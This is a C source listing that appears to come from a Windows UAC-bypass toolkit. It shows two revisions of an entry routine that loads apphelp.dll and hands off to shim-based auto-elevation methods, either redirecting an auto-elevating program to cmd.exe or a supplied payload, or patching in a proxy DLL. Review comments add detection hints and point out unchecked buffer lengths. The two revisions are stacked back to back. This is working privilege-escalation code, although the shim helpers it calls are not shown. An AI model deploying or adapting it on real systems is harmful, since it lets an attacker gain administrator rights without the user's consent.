/*
* ucmAppcompatElevation
*
* Purpose:
*
* Entry point for the Application Compatibility (shim) based autoelevation
* methods. Loads apphelp.dll, initialises the apphelp bindings through
* ucmInitAppHelp and hands off to the helper that matches Method.
*
* Method         - UacMethodRedirectExe or UacMethodShimPatch; any other
*                  value is ignored and the routine reports FALSE.
* ProxyDll,
* ProxyDllSize   - forwarded unchanged to ucmShimPatch (ShimPatch only).
* lpszPayloadEXE - optional RedirectEXE target; NULL selects the built-in
*                  cmd.exe string.
*
* Returns the selected helper's result, or FALSE when a setup step fails.
*
* NOTE(review): for detection purposes the steps visible here are a load of
* apphelp.dll from the system directory followed by shim creation and
* registration inside the helpers (not shown in this listing). Custom shim
* database registration is commonly monitored through the AppCompatFlags
* registry keys; confirm the exact artefacts against the helper code.
*
*/
BOOL ucmAppcompatElevation(
    UACBYPASSMETHOD Method,
    CONST PVOID ProxyDll,
    DWORD ProxyDllSize,
    LPWSTR lpszPayloadEXE
    )
{
    WCHAR  szPath[MAX_PATH * 2];
    LPWSTR lpszTarget = lpszPayloadEXE;

    RtlSecureZeroMemory(&szPath, sizeof(szPath));

    // The library path comes from the %systemroot% environment variable of
    // the current process. Only a zero return is treated as failure; a
    // return value above MAX_PATH (buffer too small) is not checked.
    if (ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\apphelp.dll"), szPath, MAX_PATH) == 0) {
        return FALSE;
    }

    // hAppHelp is declared outside this function; the handle is stored there
    // and is not released anywhere in this routine.
    hAppHelp = LoadLibrary(szPath);
    if (hAppHelp == NULL) {
        return FALSE;
    }

    if (!ucmInitAppHelp()) {
        return FALSE;
    }

    // RedirectEXE: create and register the shim, cmd.exe being the default
    // target when the caller supplied none. The path buffer is reused to
    // hold the default string.
    if (Method == UacMethodRedirectExe) {
        if (lpszTarget == NULL) {
            _strcpy_w(szPath, L"%systemroot%\\system32\\cmd.exe");
            lpszTarget = szPath;
        }
        return ucmShimRedirectEXE(lpszTarget);
    }

    // ShimPatch: create and register the shim patch, the proxy DLL buffer
    // (fubuki, per the project's naming) being the payload.
    if (Method == UacMethodShimPatch) {
        return ucmShimPatch(ProxyDll, ProxyDllSize);
    }

    // Any other method: nothing done beyond the apphelp setup above.
    return FALSE;
}
/*
* ucmAppcompatElevation
*
* Purpose:
*
* Entry point for the Application Compatibility (shim) based autoelevation
* methods. Loads apphelp.dll from the system directory cached in g_ctx,
* initialises the apphelp bindings through ucmInitAppHelp and hands off to
* the helper that matches Method.
*
* Method         - UacMethodRedirectExe or UacMethodShimPatch; any other
*                  value is ignored and the routine reports FALSE.
* ProxyDll,
* ProxyDllSize   - forwarded unchanged to ucmShimPatch (ShimPatch only).
* lpszPayloadEXE - optional RedirectEXE target; NULL selects T_DEFAULT_CMD.
*
* Returns the selected helper's result, or FALSE when a setup step fails.
*
* NOTE(review): for detection purposes the steps visible here are a load of
* apphelp.dll by full path followed by shim creation and registration inside
* the helpers (not shown in this listing). Custom shim database registration
* is commonly monitored through the AppCompatFlags registry keys; confirm
* the exact artefacts against the helper code.
*
*/
BOOL ucmAppcompatElevation(
    UACBYPASSMETHOD Method,
    CONST PVOID ProxyDll,
    DWORD ProxyDllSize,
    LPWSTR lpszPayloadEXE
    )
{
    WCHAR  szPath[MAX_PATH * 2];
    LPWSTR lpszTarget = lpszPayloadEXE;

    RtlSecureZeroMemory(&szPath, sizeof(szPath));

    // Full path = g_ctx.szSystemDirectory + APPHELP_DLL. Neither call takes
    // a size argument, so this relies on the combined string fitting in
    // MAX_PATH * 2 WCHARs; no length check is made here.
    _strcpy(szPath, g_ctx.szSystemDirectory);
    _strcat(szPath, APPHELP_DLL);

    // hAppHelp is declared outside this function; the handle is stored there
    // and is not released anywhere in this routine.
    hAppHelp = LoadLibrary(szPath);
    if (hAppHelp == NULL) {
        return FALSE;
    }

    if (!ucmInitAppHelp()) {
        return FALSE;
    }

    // RedirectEXE: create and register the shim, the default command being
    // the target when the caller supplied none. The path buffer is reused to
    // hold the default string.
    if (Method == UacMethodRedirectExe) {
        if (lpszTarget == NULL) {
            _strcpy_w(szPath, T_DEFAULT_CMD);
            lpszTarget = szPath;
        }
        return ucmShimRedirectEXE(lpszTarget);
    }

    // ShimPatch: create and register the shim patch, the proxy DLL buffer
    // (fubuki, per the project's naming) being the payload.
    if (Method == UacMethodShimPatch) {
        return ucmShimPatch(ProxyDll, ProxyDllSize);
    }

    // Any other method: nothing done beyond the apphelp setup above.
    return FALSE;
}